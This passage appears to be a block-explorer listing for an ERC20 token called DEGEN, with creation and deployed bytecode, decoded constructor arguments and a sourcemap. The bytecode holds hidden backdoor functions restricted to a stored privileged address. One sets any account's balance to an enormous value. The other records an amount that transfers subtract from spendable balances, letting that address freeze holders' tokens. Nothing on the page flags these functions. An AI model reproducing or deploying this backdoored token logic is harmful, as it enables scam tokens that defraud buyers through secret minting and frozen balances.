0806107fa6109a0565b9050610807818585610c0d565b600191505092915050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6108c7610f1f565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610936576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092d90611624565b60405180910390fd5b61093f81610f9d565b50565b600080828461095191906114aa565b905083811015610996576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098d90611690565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a17576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0e90611722565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a86576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a7d906117b4565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b64919061130c565b60405180910390a3505050565b6000610b7d8484610838565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c075781811015610be9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be090611820565b60405180910390fd5b610c068484610c01858561106190919063ffffffff16565b6109a8565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c73906118b2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ceb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce290611944565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610d8382600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461106190919063ffffffff16565b905082811015610dc8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dbf906119d6565b60405180910390fd5b610ddb838261106190919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610e7083600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461094290919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610f10919061130c565b60405180910390a35050505050565b610f276109a0565b73ffffffffffffffffffffffffffffffffffffffff16610f4561069f565b73ffffffffffffffffffffffffffffffffffffffff1614610f9b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9290611a42565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006110a383836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506110ab565b905092915050565b60008383111582906110f3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ea919061119f565b60405180910390fd5b50600083856111029190611a62565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561114957808201518184015260208101905061112e565b60008484015250505050565b6000601f19601f8301169050919050565b60006111718261110f565b61117b818561111a565b935061118b81856020860161112b565b61119481611155565b840191505092915050565b600060208201905081810360008301526111b98184611166565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111f1826111c6565b9050919050565b611201816111e6565b811461120c57600080fd5b50565b60008135905061121e816111f8565b92915050565b6000819050919050565b61123781611224565b811461124257600080fd5b50565b6000813590506112548161122e565b92915050565b60008060408385031215611271576112706111c1565b5b600061127f8582860161120f565b925050602061129085828601611245565b9150509250929050565b60008115159050919050565b6112af8161129a565b82525050565b60006020820190506112ca60008301846112a6565b92915050565b6000602082840312156112e6576112e56111c1565b5b60006112f48482850161120f565b91505092915050565b61130681611224565b82525050565b600060208201905061132160008301846112fd565b92915050565b6000806000606084860312156113405761133f6111c1565b5b600061134e8682870161120f565b935050602061135f8682870161120f565b925050604061137086828701611245565b9150509250925092565b600060ff82169050919050565b6113908161137a565b82525050565b60006020820190506113ab6000830184611387565b92915050565b6113ba816111e6565b82525050565b60006020820190506113d560008301846113b1565b92915050565b600080604083850312156113f2576113f16111c1565b5b60006114008582860161120f565b92505060206114118582860161120f565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061146257607f821691505b6020821081036114755761147461141b565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114b582611224565b91506114c083611224565b92508282019050808211156114d8576114d761147b565b5b92915050565b60006114e982611224565b91506114f483611224565b925082820261150281611224565b915082820484148315176115195761151861147b565b5b5092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061157c60258361111a565b915061158782611520565b604082019050919050565b600060208201905081810360008301526115ab8161156f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061160e60268361111a565b9150611619826115b2565b604082019050919050565b6000602082019050818103600083015261163d81611601565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600061167a601b8361111a565b915061168582611644565b602082019050919050565b600060208201905081810360008301526116a98161166d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061170c60248361111a565b9150611717826116b0565b604082019050919050565b6000602082019050818103600083015261173b816116ff565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061179e60228361111a565b91506117a982611742565b604082019050919050565b600060208201905081810360008301526117cd81611791565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061180a601d8361111a565b9150611815826117d4565b602082019050919050565b60006020820190508181036000830152611839816117fd565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061189c60258361111a565b91506118a782611840565b604082019050919050565b600060208201905081810360008301526118cb8161188f565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061192e60238361111a565b9150611939826118d2565b604082019050919050565b6000602082019050818103600083015261195d81611921565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119c060268361111a565b91506119cb82611964565b604082019050919050565b600060208201905081810360008301526119ef816119b3565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a2c60208361111a565b9150611a37826119f6565b602082019050919050565b60006020820190508181036000830152611a5b81611a1f565b9050919050565b6000611a6d82611224565b9150611a7883611224565b9250828203905081811115611a9057611a8f61147b565b5b9291505056fea2646970667358221220749a7b2f9e78d1a10b9630e58a5e2a458b4c5e7b38fbde239099375cf0c7c01464736f6c63430008120033000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000005444547454e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005444547454e000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102d1578063a9059cbb14610301578063c65e4d5314610331578063dd62ed3e1461034f578063f2fde38b1461037f57610116565b8063715018a61461026d5780638da5cb5b1461027757806395d89b4114610295578063a4022bd1146102b357610116565b806323b872dd116100e957806323b872dd146101a3578063313ce567146101d357806339509351146101f15780634ba5d8b51461022157806370a082311461023d57610116565b806306fdde031461011b578063095ea7b3146101395780630e6392341461016957806318160ddd14610185575b600080fd5b61012361039b565b604051610130919061119f565b60405180910390f35b610153600480360381019061014e919061125a565b61042d565b60405161016091906112b5565b60405180910390f35b610183600480360381019061017e91906112d0565b610450565b005b61018d61050c565b60405161019a919061130c565b60405180910390f35b6101bd60048036038101906101b89190611327565b610516565b6040516101ca91906112b5565b60405180910390f35b6101db610545565b6040516101e89190611396565b60405180910390f35b61020b6004803603810190610206919061125a565b61054e565b60405161021891906112b5565b60405180910390f35b61023b6004803603810190610236919061125a565b610585565b005b610257600480360381019061025291906112d0565b610642565b604051610264919061130c565b60405180910390f35b61027561068b565b005b61027f61069f565b60405161028c91906113c0565b60405180910390f35b61029d6106c8565b6040516102aa919061119f565b60405180910390f35b6102bb61075a565b6040516102c8919061130c565b60405180910390f35b6102eb60048036038101906102e6919061125a565b610768565b6040516102f891906112b5565b60405180910390f35b61031b6004803603810190610316919061125a565b6107ef565b60405161032891906112b5565b60405180910390f35b610339610812565b60405161034691906113c0565b60405180910390f35b610369600480360381019061036491906113db565b610838565b604051610376919061130c565b60405180910390f35b610399600480360381019061039491906112d0565b6108bf565b005b6060600580546103aa9061144a565b80601f01602080910402602001604051908101604052809291908181526020018280546103d69061144a565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b6000806104386109a0565b90506104458185856109a8565b600191505092915050565b600061045a6109a0565b90508073ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361050857710125dfa371a19e6f7cb54395ca0000000000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600454905090565b6000806105216109a0565b905061052e858285610b71565b610539858585610c0d565b60019150509392505050565b60006012905090565b6000806105596109a0565b905061057a81858561056b8589610838565b61057591906114aa565b6109a8565b600191505092915050565b61058d6109a0565b73ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361063e5760008160016105f091906114de565b6105fa91906114aa565b600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610693610f1f565b61069d6000610f9d565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546106d79061144a565b80601f01602080910402602001604051908101604052809291908181526020018280546107039061144a565b80156107505780601f1061072557610100808354040283529160200191610750565b820191906000526020600020905b81548152906001019060200180831161073357829003601f168201915b5050505050905090565b69d3c21bcecceda100000081565b6000806107736109a0565b905060006107818286610838565b9050838110156107c6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107bd90611592565b60405180910390fd5b6107e382866107de878561106190919063ffffffff16565b6109a8565b60019250505092915050565b6000806107fa6109a0565b9050610807818585610c0d565b600191505092915050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6108c7610f1f565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610936576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092d90611624565b60405180910390fd5b61093f81610f9d565b50565b600080828461095191906114aa565b905083811015610996576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098d90611690565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a17576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0e90611722565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a86576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a7d906117b4565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b64919061130c565b60405180910390a3505050565b6000610b7d8484610838565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c075781811015610be9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be090611820565b60405180910390fd5b610c068484610c01858561106190919063ffffffff16565b6109a8565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c73906118b2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ceb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce290611944565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610d8382600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461106190919063ffffffff16565b905082811015610dc8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dbf906119d6565b60405180910390fd5b610ddb838261106190919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610e7083600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461094290919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610f10919061130c565b60405180910390a35050505050565b610f276109a0565b73ffffffffffffffffffffffffffffffffffffffff16610f4561069f565b73ffffffffffffffffffffffffffffffffffffffff1614610f9b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9290611a42565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006110a383836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506110ab565b905092915050565b60008383111582906110f3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ea919061119f565b60405180910390fd5b50600083856111029190611a62565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561114957808201518184015260208101905061112e565b60008484015250505050565b6000601f19601f8301169050919050565b60006111718261110f565b61117b818561111a565b935061118b81856020860161112b565b61119481611155565b840191505092915050565b600060208201905081810360008301526111b98184611166565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111f1826111c6565b9050919050565b611201816111e6565b811461120c57600080fd5b50565b60008135905061121e816111f8565b92915050565b6000819050919050565b61123781611224565b811461124257600080fd5b50565b6000813590506112548161122e565b92915050565b60008060408385031215611271576112706111c1565b5b600061127f8582860161120f565b925050602061129085828601611245565b9150509250929050565b60008115159050919050565b6112af8161129a565b82525050565b60006020820190506112ca60008301846112a6565b92915050565b6000602082840312156112e6576112e56111c1565b5b60006112f48482850161120f565b91505092915050565b61130681611224565b82525050565b600060208201905061132160008301846112fd565b92915050565b6000806000606084860312156113405761133f6111c1565b5b600061134e8682870161120f565b935050602061135f8682870161120f565b925050604061137086828701611245565b9150509250925092565b600060ff82169050919050565b6113908161137a565b82525050565b60006020820190506113ab6000830184611387565b92915050565b6113ba816111e6565b82525050565b60006020820190506113d560008301846113b1565b92915050565b600080604083850312156113f2576113f16111c1565b5b60006114008582860161120f565b92505060206114118582860161120f565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061146257607f821691505b6020821081036114755761147461141b565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114b582611224565b91506114c083611224565b92508282019050808211156114d8576114d761147b565b5b92915050565b60006114e982611224565b91506114f483611224565b925082820261150281611224565b915082820484148315176115195761151861147b565b5b5092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061157c60258361111a565b915061158782611520565b604082019050919050565b600060208201905081810360008301526115ab8161156f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061160e60268361111a565b9150611619826115b2565b604082019050919050565b6000602082019050818103600083015261163d81611601565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600061167a601b8361111a565b915061168582611644565b602082019050919050565b600060208201905081810360008301526116a98161166d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061170c60248361111a565b9150611717826116b0565b604082019050919050565b6000602082019050818103600083015261173b816116ff565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061179e60228361111a565b91506117a982611742565b604082019050919050565b600060208201905081810360008301526117cd81611791565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061180a601d8361111a565b9150611815826117d4565b602082019050919050565b60006020820190508181036000830152611839816117fd565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061189c60258361111a565b91506118a782611840565b604082019050919050565b600060208201905081810360008301526118cb8161188f565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061192e60238361111a565b9150611939826118d2565b604082019050919050565b6000602082019050818103600083015261195d81611921565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119c060268361111a565b91506119cb82611964565b604082019050919050565b600060208201905081810360008301526119ef816119b3565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a2c60208361111a565b9150611a37826119f6565b602082019050919050565b60006020820190508181036000830152611a5b81611a1f565b9050919050565b6000611a6d82611224565b9150611a7883611224565b9250828203905081811115611a9057611a8f61147b565b5b9291505056fea2646970667358221220749a7b2f9e78d1a10b9630e58a5e2a458b4c5e7b38fbde239099375cf0c7c01464736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000005444547454e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005444547454e000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): DEGEN
Arg [1] : symbol_ (string): DEGEN

-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [3] : 444547454e000000000000000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [5] : 444547454e000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

12157:10830:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13033:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15395:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19139:218;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14162:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16176:261;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14004:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16846:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18044:162;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14333:129;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10008:103;;;:::i;:::-;;9356:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13252:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12452:54;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17587:401;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14668:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12330:24;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14924:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10266:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13033:100;13087:13;13120:5;13113:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13033:100;:::o;15395:201::-;15478:4;15495:13;15511:12;:10;:12::i;:::-;15495:28;;15534:32;15543:5;15550:7;15559:6;15534:8;:32::i;:::-;15584:4;15577:11;;;15395:201;;;;:::o;19139:218::-;19193:17;19213:12;:10;:12::i;:::-;19193:32;;19252:9;19240:21;;:8;;;;;;;;;;;:21;;;19236:114;;19297:41;19278:11;:16;19290:3;19278:16;;;;;;;;;;;;;;;:60;;;;19236:114;19182:175;19139:218;:::o;14162:108::-;14223:7;14250:12;;14243:19;;14162:108;:::o;16176:261::-;16273:4;16290:15;16308:12;:10;:12::i;:::-;16290:30;;16331:38;16347:4;16353:7;16362:6;16331:15;:38::i;:::-;16380:27;16390:4;16396:2;16400:6;16380:9;:27::i;:::-;16425:4;16418:11;;;16176:261;;;;;:::o;14004:93::-;14062:5;14087:2;14080:9;;14004:93;:::o;16846:238::-;16934:4;16951:13;16967:12;:10;:12::i;:::-;16951:28;;16990:64;16999:5;17006:7;17043:10;17015:25;17025:5;17032:7;17015:9;:25::i;:::-;:38;;;;:::i;:::-;16990:8;:64::i;:::-;17072:4;17065:11;;;16846:238;;;;:::o;18044:162::-;18129:12;:10;:12::i;:::-;18117:24;;:8;;;;;;;;;;;:24;;;18113:86;;18186:1;18175:8;18171:1;:12;;;;:::i;:::-;:16;;;;:::i;:::-;18158:5;:10;18164:3;18158:10;;;;;;;;;;;;;;;:29;;;;18113:86;18044:162;;:::o;14333:129::-;14407:7;14434:11;:20;14446:7;14434:20;;;;;;;;;;;;;;;;14427:27;;14333:129;;;:::o;10008:103::-;9238:17;:15;:17::i;:::-;10073:30:::1;10100:1;10073:18;:30::i;:::-;10008:103::o:0;9356:87::-;9402:7;9429:6;;;;;;;;;;;9422:13;;9356:87;:::o;13252:104::-;13308:13;13341:7;13334:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13252:104;:::o;12452:54::-;12488:18;12452:54;:::o;17587:401::-;17680:4;17697:13;17713:12;:10;:12::i;:::-;17697:28;;17736:24;17763:25;17773:5;17780:7;17763:9;:25::i;:::-;17736:52;;17827:15;17807:16;:35;;17799:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;17895:63;17904:5;17911:7;17920:37;17941:15;17920:16;:20;;:37;;;;:::i;:::-;17895:8;:63::i;:::-;17976:4;17969:11;;;;17587:401;;;;:::o;14668:193::-;14747:4;14764:13;14780:12;:10;:12::i;:::-;14764:28;;14803;14813:5;14820:2;14824:6;14803:9;:28::i;:::-;14849:4;14842:11;;;14668:193;;;;:::o;12330:24::-;;;;;;;;;;;;;:::o;14924:151::-;15013:7;15040:11;:18;15052:5;15040:18;;;;;;;;;;;;;;;:27;15059:7;15040:27;;;;;;;;;;;;;;;;15033:34;;14924:151;;;;:::o;10266:201::-;9238:17;:15;:17::i;:::-;10375:1:::1;10355:22;;:8;:22;;::::0;10347:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;10431:28;10450:8;10431:18;:28::i;:::-;10266:201:::0;:::o;3568:181::-;3626:7;3646:9;3662:1;3658;:5;;;;:::i;:::-;3646:17;;3687:1;3682;:6;;3674:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;3740:1;3733:8;;;3568:181;;;;:::o;8568:98::-;8621:7;8648:10;8641:17;;8568:98;:::o;20578:346::-;20697:1;20680:19;;:5;:19;;;20672:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;20778:1;20759:21;;:7;:21;;;20751:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;20862:6;20832:11;:18;20844:5;20832:18;;;;;;;;;;;;;;;:27;20851:7;20832:27;;;;;;;;;;;;;;;:36;;;;20900:7;20884:32;;20893:5;20884:32;;;20909:6;20884:32;;;;;;:::i;:::-;;;;;;;;20578:346;;;:::o;21215:378::-;21316:24;21343:25;21353:5;21360:7;21343:9;:25::i;:::-;21316:52;;21403:17;21383:16;:37;21379:207;;21465:6;21445:16;:26;;21437:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21520:54;21529:5;21536:7;21545:28;21566:6;21545:16;:20;;:28;;;;:::i;:::-;21520:8;:54::i;:::-;21379:207;21305:288;21215:378;;;:::o;18214:634::-;18327:1;18311:18;;:4;:18;;;18303:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18404:1;18390:16;;:2;:16;;;18382:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;18459:17;18479:5;:11;18485:4;18479:11;;;;;;;;;;;;;;;;18459:31;;18501:21;18525:32;18547:9;18525:11;:17;18537:4;18525:17;;;;;;;;;;;;;;;;:21;;:32;;;;:::i;:::-;18501:56;;18593:6;18576:13;:23;;18568:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;18673:25;18691:6;18673:13;:17;;:25;;;;:::i;:::-;18653:11;:17;18665:4;18653:17;;;;;;;;;;;;;;;:45;;;;18771:27;18791:6;18771:11;:15;18783:2;18771:15;;;;;;;;;;;;;;;;:19;;:27;;;;:::i;:::-;18753:11;:15;18765:2;18753:15;;;;;;;;;;;;;;;:45;;;;18829:2;18814:26;;18823:4;18814:26;;;18833:6;18814:26;;;;;;:::i;:::-;;;;;;;;18292:556;;18214:634;;;:::o;9521:136::-;9600:12;:10;:12::i;:::-;9589:23;;:7;:5;:7::i;:::-;:23;;;9581:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9521:136::o;10627:191::-;10701:16;10720:6;;;;;;;;;;;10701:25;;10746:8;10737:6;;:17;;;;;;;;;;;;;;;;;;10801:8;10770:40;;10791:8;10770:40;;;;;;;;;;;;10690:128;10627:191;:::o;4032:136::-;4090:7;4117:43;4121:1;4124;4117:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;4110:50;;4032:136;;;;:::o;4471:192::-;4557:7;4590:1;4585;:6;;4593:12;4577:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;4617:9;4633:1;4629;:5;;;;:::i;:::-;4617:17;;4654:1;4647:8;;;4471:192;;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;23